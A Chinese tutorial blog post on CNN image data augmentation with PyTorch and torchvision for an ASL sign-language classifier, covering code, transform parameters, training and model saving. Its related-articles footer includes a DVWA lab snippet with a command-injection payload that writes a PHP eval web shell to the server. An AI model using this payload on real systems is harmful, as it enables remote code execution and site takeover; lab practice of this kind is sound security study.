机器学习详解(13):CNN图像数据增强(解决过拟合问题)

在之前的文章卷积神经网络CNN之手语识别代码详解中,我们发现最后的训练和验证损失的曲线的波动非常大,而且验证集的准确率仍然落后于训练集的准确率,这表明模型出现了过拟合现象:在验证数据集测试时,模型对未见过的数据表现不佳。

文章目录

  • 1 数据增强
  • 2 代码流程
    • 2.1 数据准备
    • 2.2 模型创建
      • 2.2.1 卷积块类
      • 2.2.2 使用自定义模块构建模型
    • 2.3 数据增强
      • 2.3.1 RandomResizedCrop
      • 2.3.2 RandomHorizontalFlip
      • 2.3.3 RandomRotation
      • 2.3.4 ColorJitter
      • 2.3.5 Compose
      • 2.3.6 总结
    • 2.4 训练
    • 2.5 保存模型
  • 3 总结

1 数据增强

为了提高模型在新数据上的鲁棒性,我们计划通过编程方式增加数据集的规模和多样性。这被称为数据增强(data augmentation),是深度学习应用中的一种常用技术。

  1. 数据集规模的增加为模型训练提供了更多的图像样本;
  2. 数据的多样性增加有助于模型忽略不重要的特征,仅选择对分类真正重要的特征,从而提高模型的泛化能力。

本篇文章步骤如下:

  • 对ASL(美式手语)数据集进行数据增强;
  • 使用增强后的数据训练改进模型;
  • 保存训练好的模型以便部署使用。

2 代码流程

和之前的文章一样,我们读取ASL手语数据文件,然后进行标签&数据分离、归一化等操作,然后将数据集分为训练和验证两个部分。

使用到的库如下:

import torch.nn as nn
import pandas as pd
import torch
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms.v2 as transforms
import torchvision.transforms.functional as F
import matplotlib.pyplot as plt

import utils

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.cuda.is_available()

import torch._dynamo
torch._dynamo.config.suppress_errors = True

2.1 数据准备

这里不再详细说明这里的代码,有不懂的可以参考下面的注释或文章开头提到的文章。

# 定义图像的维度和分类数量
IMG_HEIGHT = 28       # 输入图像的高度
IMG_WIDTH = 28        # 输入图像的宽度
IMG_CHS = 1           # 图像的通道数(1表示灰度图像)
N_CLASSES = 24        # 输出的类别数量

# 从CSV文件加载训练集和验证集
train_df = pd.read_csv("sign_mnist_train.csv")  # 训练集数据
valid_df = pd.read_csv("sign_mnist_valid.csv")  # 验证集数据

# 自定义数据集类
class MyDataset(Dataset):
    def __init__(self, base_df):
        # 拷贝基础数据框并分离标签和特征
        x_df = base_df.copy()                  # 复制数据框,避免修改原始数据
        y_df = x_df.pop('label')               # 提取标签列
        x_df = x_df.values / 255               # 将图像像素值归一化到0到1之间
        x_df = x_df.reshape(-1, IMG_CHS, IMG_WIDTH, IMG_HEIGHT)  # 重塑为适配模型的形状
        self.xs = torch.tensor(x_df).float().to(device)  # 转换为张量并移动到设备(如GPU)
        self.ys = torch.tensor(y_df).to(device)          # 标签转为张量并移动到设备

    def __getitem__(self, idx):
        # 获取指定索引的图像和标签
        x = self.xs[idx]  # 获取图像数据
        y = self.ys[idx]  # 获取标签数据
        return x, y

    def __len__(self):
        # 返回数据集的大小
        return len(self.xs)

# 定义批次大小
n = 32

# 初始化训练数据集和数据加载器
train_data = MyDataset(train_df)                       # 创建训练数据集
train_loader = DataLoader(train_data, batch_size=n, shuffle=True)  # 创建训练数据加载器并打乱顺序
train_N = len(train_loader.dataset)                    # 获取训练集的样本数量

# 初始化验证数据集和数据加载器
valid_data = MyDataset(valid_df)                       # 创建验证数据集
valid_loader = DataLoader(valid_data, batch_size=n)    # 创建验证数据加载器
valid_N = len(valid_loader.dataset)                    # 获取验证集的样本数量

2.2 模型创建

2.2.1 卷积块类

通过前面的学习,我们知道卷积神经网络(CNN)使用重复的层序列。我们可以利用这一模式,创建一个自定义卷积模块,并将其作为一个层嵌入到Sequential模型中。

为了实现这一目标,我们将扩展Module类,并定义两个方法:

  1. __init__ 方法:定义模块的属性,包括我们需要的神经网络层。在这里,我们可以实现“模型中的模型”。
  2. forward 方法:定义模块如何处理来自前一层的输入数据。由于我们使用Sequential模型,可以直接将输入数据传入模块,类似于执行预测。
class MyConvBlock(nn.Module):
    def __init__(self, in_ch, out_ch, dropout_p):
        kernel_size = 3  # 卷积核大小
        super().__init__()

        # 定义模块内的层结构
        self.model = nn.Sequential(
            nn.Conv2d(in_ch, out_ch, kernel_size, stride=1, padding=1),  # 卷积层
            nn.BatchNorm2d(out_ch),  # 批归一化
            nn.ReLU(),               # 激活函数
            nn.Dropout(dropout_p),   # Dropout防止过拟合
            nn.MaxPool2d(2, stride=2)  # 最大池化层
        )

    def forward(self, x):
        # 定义数据流动逻辑
        return self.model(x)

2.2.2 使用自定义模块构建模型

现在我们定义了自定义模块,可以将其应用到实际模型中:

flattened_img_size = 75 * 3 * 3  # 扁平化后图像的大小

# 构建Sequential模型
base_model = nn.Sequential(
    MyConvBlock(IMG_CHS, 25, 0),     # 输入:1x28x28,输出:25x14x14
    MyConvBlock(25, 50, 0.2),       # 输出:50x7x7
    MyConvBlock(50, 75, 0),         # 输出:75x3x3
    nn.Flatten(),                   # 扁平化
    nn.Linear(flattened_img_size, 512),  # 全连接层
    nn.Dropout(0.3),                # Dropout
    nn.ReLU(),                      # 激活函数
    nn.Linear(512, N_CLASSES)       # 输出层
)

损失函数和优化器如下:

loss_function = nn.CrossEntropyLoss() 	   # 定义交叉熵损失函数
optimizer = Adam(base_model.parameters())  # 定义Adam优化器

最后编译模型,PyTorch将对模型做出优化:

model = torch.compile(base_model.to(device))  # 使用PyTorch 2.0编译模型
model

输出:
OptimizedModule(
  (_orig_mod): Sequential(
    (0): MyConvBlock(
      (model): Sequential(
        (0): Conv2d(1, 25, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
        (1): BatchNorm2d(25, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU()
        (3): Dropout(p=0, inplace=False)
        (4): MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
      )
    )
    (1): MyConvBlock(
      (model): Sequential(
        (0): Conv2d(25, 50, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
        (1): BatchNorm2d(50, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU()
        (3): Dropout(p=0.2, inplace=False)
        (4): MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
      )
    )
    (2): MyConvBlock(
      (model): Sequential(
        (0): Conv2d(50, 75, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
        (1): BatchNorm2d(75, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU()
        (3): Dropout(p=0, inplace=False)
        (4): MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
      )
    )
    (3): Flatten(start_dim=1, end_dim=-1)
    (4): Linear(in_features=675, out_features=512, bias=True)
    (5): Dropout(p=0.3, inplace=False)
    (6): ReLU()
    (7): Linear(in_features=512, out_features=24, bias=True)
  )
)

2.3 数据增强

在定义训练循环之前,需要先设置数据增强(Data Augmentation)。我们将通过 TorchVision 的 Transforms 工具进一步探索数据增强的方法。以下是具体的步骤:

获取测试图像

首先,从数据集中提取一张示例图片用于测试:

row_0 = train_df.head(1)
y_0 = row_0.pop('label')
x_0 = row_0.values / 255
x_0 = x_0.reshape(IMG_CHS, IMG_WIDTH, IMG_HEIGHT)
x_0 = torch.tensor(x_0)
x_0.shape  # 输出torch.Size([1, 28, 28])

image = F.to_pil_image(x_0)
plt.imshow(image, cmap='gray')

图片如下:

在这里插入图片描述

2.3.1 RandomResizedCrop

  • 功能:随机调整图像大小并裁剪为指定尺寸。
  • 原理:根据比例调整输入图像大小后裁剪。

代码示例

# 定义随机调整大小并裁剪的变换
trans = transforms.Compose([
    transforms.RandomResizedCrop((IMG_WIDTH, IMG_HEIGHT), scale=(.7, 1), ratio=(1, 1)),
])

# 应用变换并生成新的张量
new_x_0 = trans(x_0)
# 转换为 PIL 图像以便显示
image = F.to_pil_image(new_x_0)
plt.imshow(image, cmap='gray')  # 显示裁剪后的图像
new_x_0.shape  # 输出torch.Size([1, 28, 28])
  • scale=(.7, 1):指定裁剪区域相对于原始图像面积的比例范围。

    • .7 表示裁剪区域最小可以是原始图像面积的 70%。

    • 1 表示裁剪区域最大可以是原始图像的 100%。

  • ratio=(1, 1):指定裁剪区域的宽高比范围。

    • (1, 1) 表示裁剪区域的宽高比固定为 1:1,即裁剪区域总是正方形

输出如下:

在这里插入图片描述

2.3.2 RandomHorizontalFlip

功能:随机水平翻转图像。

思考

  • 水平翻转可以增强数据多样性,但垂直翻转可能破坏语义。
  • 例如,美国手语(ASL)可以左右手互换,但上下翻转的情况很少出现。
# 定义随机水平翻转的变换
trans = transforms.Compose([
    transforms.RandomHorizontalFlip()
])

# 应用变换并生成新的张量
new_x_0 = trans(x_0)
# 转换为 PIL 图像以便显示
image = F.to_pil_image(new_x_0)
plt.imshow(image, cmap='gray')  # 显示翻转后的图像

输出:

在这里插入图片描述

2.3.3 RandomRotation

功能:随机旋转图像以增加多样性。

注意

  • 旋转角度过大可能导致图像的语义信息被误读。
  • 例如,手语中的“D”可能被错误解读为“G”。因此,需限制旋转范围。

代码解释

# 定义随机旋转的变换,限制在 ±10 度内
trans = transforms.Compose([
    transforms.RandomRotation(10)
])

# 应用变换并生成新的张量
new_x_0 = trans(x_0)
# 转换为 PIL 图像以便显示
image = F.to_pil_image(new_x_0)
plt.imshow(image, cmap='gray')  # 显示旋转后的图像

输出:

在这里插入图片描述

2.3.4 ColorJitter

功能:随机调整图像的亮度和对比度。用来模拟光照条件的变化

参数

  • brightness:控制亮度变化的幅度(0~1)。
  • contrast:控制对比度变化的幅度(0~1)。

代码解释

# 设置亮度和对比度参数
brightness = .2  # 亮度变化范围
contrast = .5  # 对比度变化范围

# 定义亮度和对比度调整的变换
trans = transforms.Compose([
    transforms.ColorJitter(brightness=brightness, contrast=contrast)
])

# 应用变换并生成新的张量
new_x_0 = trans(x_0)
# 转换为 PIL 图像以便显示
image = F.to_pil_image(new_x_0)
plt.imshow(image, cmap='gray')  # 显示调整后的图像

输出:

在这里插入图片描述

2.3.5 Compose

功能:组合多个随机变换为一个序列,使数据增强更加灵活。

应用场景:结合多种增强手段,生成无限多样的数据变体。

代码解释

# 定义一组随机变换
random_transforms = transforms.Compose([
    transforms.RandomRotation(5),  # 小范围旋转
    transforms.RandomResizedCrop((IMG_WIDTH, IMG_HEIGHT), scale=(.9, 1), ratio=(1, 1)),  # 随机裁剪
    transforms.RandomHorizontalFlip(),  # 随机水平翻转
    transforms.ColorJitter(brightness=.2, contrast=.5)  # 调整亮度和对比度
])

# 应用组合变换并生成新的张量
new_x_0 = random_transforms(x_0)
# 转换为 PIL 图像以便显示
image = F.to_pil_image(new_x_0)
plt.imshow(image, cmap='gray')  # 显示综合增强后的图像

输出:

在这里插入图片描述

2.3.6 总结

增强方法功能关键参数作用注意事项
RandomResizedCrop随机调整图像大小并裁剪为指定尺寸- scale=(.7, 1): 裁剪区域面积占原图面积的比例范围, ratio=(1, 1): 裁剪区域宽高比范围 (正方形)生成不同大小的随机裁剪区域,增强图像的局部视角多样性如果设置不当,可能裁剪掉重要的图像信息
RandomHorizontalFlip随机水平翻转图像- p=0.5(默认):翻转的概率增强数据多样性,适合左右对称的场景,如手语、自然景物等不适用于语义上不对称的图像(如文字)
RandomRotation随机旋转图像- degrees=10: 旋转角度范围(±10度)增加图像的角度变化,模拟不同视角的情况旋转角度过大可能引起语义混淆,例如手语符号“D”和“G”可能被误读
ColorJitter调整图像亮度和对比度brightness=0.2: 亮度变化范围, contrast=0.5: 对比度变化范围模拟光照变化条件,增强数据在不同环境下的适应能力如果参数设置过大,可能导致图像失真

2.4 训练

我们的训练流程与之前大致相同,但有一处不同:在将图像输入模型之前,需应用前面我们定义的 random_transforms 进行数据增强。

def train():
    loss = 0  # 初始化损失值
    accuracy = 0  # 初始化准确率

    model.train()  # 设置模型为训练模式
    for x, y in train_loader:  # 遍历训练数据
        output = model(random_transforms(x))  # 应用随机数据增强并将图像输入模型
        optimizer.zero_grad()  # 清除梯度
        batch_loss = loss_function(output, y)  # 计算当前批次的损失
        batch_loss.backward()  # 反向传播计算梯度
        optimizer.step()  # 更新模型权重

        # 累加损失和准确率
        loss += batch_loss.item()
        accuracy += get_batch_accuracy(output, y, train_N)
    # 打印训练结果
    print('Train - Loss: {:.4f} Accuracy: {:.4f}'.format(loss, accuracy))

下面是训练和验证集的损失曲线和准确率曲线:

在这里插入图片描述

在这里插入图片描述

对比之前的损失曲线,明显在一定程度上优化了过拟合的问题。

2.5 保存模型

现在我们已经拥有一个训练良好的模型,可以将其部署用于对新图像进行推断。当我们对训练的模型感到满意时,通常会将其保存到磁盘。PyTorch 提供了多种方法来实现这一点,这里我们将使用torch.save方法。在下一篇文章中,我们会加载该模型,并使用它来识别新的手语图片。

需要注意的是,PyTorch无法保存已编译的模型(参考文章)

  • 在 PyTorch 中,model(编译后的模型)和base_model(未编译的模型)是共享权重的。因此,无论你对 model 进行训练,还是对其权重进行修改,这些变化都会同步到 base_model,因为它们底层实际上引用了同一组权重。

因此我们将使用以下代码保存模型:

torch.save(base_model, 'model.pth')

3 总结

数据增强通过随机裁剪、翻转、旋转和颜色抖动等手段,生成多样化的训练样本,有效提高了模型的泛化能力,减少了过拟合的风险。在训练阶段引入随机变换,可以模拟不同的场景变化,使模型更具鲁棒性。同时,通过合理设置增强参数,确保数据增强不会破坏图像的语义信息,从而在性能与稳定性之间取得平衡。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/948155.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Word2Vec解读

Word2Vec: 一种词向量的训练方法 简单地讲,Word2Vec是建模了一个单词预测的任务,通过这个任务来学习词向量。假设有这样一句话Pineapples are spiked and yellow,现在假设spiked这个单词被删掉了,现在要预测这个位置原本的单词是…

#渗透测试#漏洞挖掘#WAF分类及绕过思路

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停…

电子应用设计方案85:智能 AI门前柜系统设计

智能 AI 门前柜系统设计 一、引言 智能 AI 门前柜系统旨在提供便捷、安全和智能的物品存储与管理解决方案,适用于家庭、公寓或办公场所的入口区域。 二、系统概述 1. 系统目标 - 实现无接触式物品存取,减少交叉感染风险。 - 具备智能识别和分类功能&am…

如何在不丢失数据的情况下从 IOS 14 回滚到 IOS 13

您是否后悔在 iPhone、iPad 或 iPod touch 上安装 iOS 14?如果你这样做,你并不孤单。许多升级到 iOS 14 beta 的 iPhone、iPad 和 iPod touch 用户不再适应它。 如果您在正式发布日期之前升级到 iOS 14 以享受其功能,但您不再适应 iOS 14&am…

线性代数考研笔记

行列式 背景 分子行列式:求哪个未知数,就把b1,b2放在对应的位置 分母行列式:系数对应写即可 全排列与逆序数 1 3 2:逆序数为1 奇排列 1 2 3:逆序数为0 偶排列 将 1 3 2 只需将3 2交换1次就可以还原原…

设计心得——流程图和数据流图绘制

一、流程图和数据流图 在软件开发中,画流程图和数据流图可以说是几乎每个人都会遇到。 1、数据流(程)图 Data Flow Diagram,DFG。它可以称为数据流图或数据流程图。其主要用来描述系统中数据流程的一种图形工具,可以将…

SpringBoot框架开发中常用的注解

文章目录 接收HTTP请求。RestController全局异常处理器Component依赖注入LombokDataBuildersneakyThrowsRequiredArgsConstructor 读取yml文件配置类注解 接收HTTP请求。 RequestMapping 接收HTTP请求。具体一点是 GetMapping PostMapping PutMapping DeleteMapping 一共…

ELK日志平台搭建 (最新版)

一、安装 JDK 1. 下载 JDK 21 RPM 包 wget https://download.oracle.com/java/21/latest/jdk-21_linux-x64_bin.rpm2. 安装 JDK 21,使用 rpm 命令安装下载的 RPM 包: sudo rpm -ivh jdk-21_linux-x64_bin.rpm3. 配置环境变量 编辑 /etc/profile 文件以配置 JAVA_HO…

使用 Jupyter Notebook:安装与应用指南

文章目录 安装 Jupyter Notebook1. 准备环境2. 安装 Jupyter Notebook3. 启动 Jupyter Notebook4. 选择安装方式(可选) 二、Jupyter Notebook 的基本功能1. 单元格的类型与运行2. 可视化支持3. 内置魔法命令 三、Jupyter Notebook 的实际应用场景1. 数据…

AcWing-164.可达性统计(拓扑排序 + 位运算)

原题链接:164. 可达性统计 - AcWing题库 题目描述: 题目 输入格式 输出格式 数据范围 输入样例: 输出样例: 思路 AC代码: 题目描述: 题目 给定一张 𝑁 个点 𝑀 条边的有向无…

Windows安装了pnpm后无法在Vscode中使用

Windows安装了pnpm后无法在Vscode中使用 解决方法: 以管理员身份打开 PowerShell 并执行以下命令后输入Y回车即可。 Set-ExecutionPolicy RemoteSigned -Scope CurrentUser之后就可以正常使用了

python学opencv|读取图像(二十五)使用cv2.putText()绘制文字进阶-垂直镜像文字

【1】引言 前序学习进程找那个,已经掌握了使用pythonopencv绘制常规文字和倾斜文字的基本技巧。相关链接如下: python学opencv|读取图像(二十三)使用cv2.putText()绘制文字-CSDN博客 python学opencv|读取图像(二十四…

6.充放电相关实验(过压、欠压、过流、短路、过温、低温)演示

1.充放电演示 (1)一定要按照操作步骤来,先将电池板上的充放电开关一定要处于断开状态(字母O一边按下是断开,字母I一边按下是接通),然后夹上充电器的电源夹子到BMS控制板的PACK-、PACK+两端,然后给充电器插上电源(如果使用自己的充电器一定要注意不要大于21V),然后拨动…

解决HBuilderX报错:未安装内置终端插件,是否下载?或使用外部命令行打开。

版权声明 本文原创作者:谷哥的小弟作者博客地址:http://blog.csdn.net/lfdfhl 错误描述 在HBuilderX中执行npm run build总是提醒下载插件;图示如下: 但是,下载总是失败。运行项目时候依然弹出上述提醒。 解决方案 …

【小程序开发】- 小程序版本迭代指南(版本发布教程)

一,版本号 版本号是小程序版本的标识,通常由一系列数字组成,如 1.0.0、1.1.0 等。版本号的格式通常是 主版本号.次版本号.修订号 主版本号:当小程序有重大更新或不兼容的更改时,主版本号会增加。 次版本号&#xff1a…

基于微信小程序投票评选系统的设计与实现ssm+论文源码调试讲解

第4章 系统设计 4.1 系统设计的原则 在系统设计过程中,也需要遵循相应的设计原则,这些设计原则可以帮助设计者在短时间内设计出符合设计规范的设计方案。设计原则主要有可靠性,安全性,可定制化,可扩展性,可…

库伦值自动化功耗测试工具

1. 功能介绍 PlatformPower工具可以自动化测试不同场景的功耗电流,并可导出为excel文件便于测试结果分析查看。测试同时便于后续根据需求拓展其他自动化测试用例。 主要原理:基于文件节点 coulomb_count 实现,计算公式:电流&…

AWS re:Invent 的创新技术

本月早些时候,Amazon 于 12 月 1 日至 5 日在内华达州拉斯维加斯举行了为期 5 天的 re:Invent 大会。如果您从未参加过 re:Invent 会议,那么最能描述它的词是“巨大”——不仅从与会者人数(60,000 人)来看&…

DVWA 命令注入写shell记录

payload 127.0.0.1;echo "<?php eval($_POST["md"]);?>" > md.php 成功写入&#xff0c;访问查看 成功解析

lua库介绍:数据处理与操作工具库 - leo

leo库简介 leo 模块的创作初衷旨在简化数据处理的复杂流程&#xff0c;提高代码的可读性和执行效率&#xff0c;希望leo 模块都能为你提供一系列便捷的工具函数&#xff0c;涵盖因子编码、多维数组创建、数据框构建、列表管理以及管道操作等功能。 要使用 Leo 模块&#xff0c;…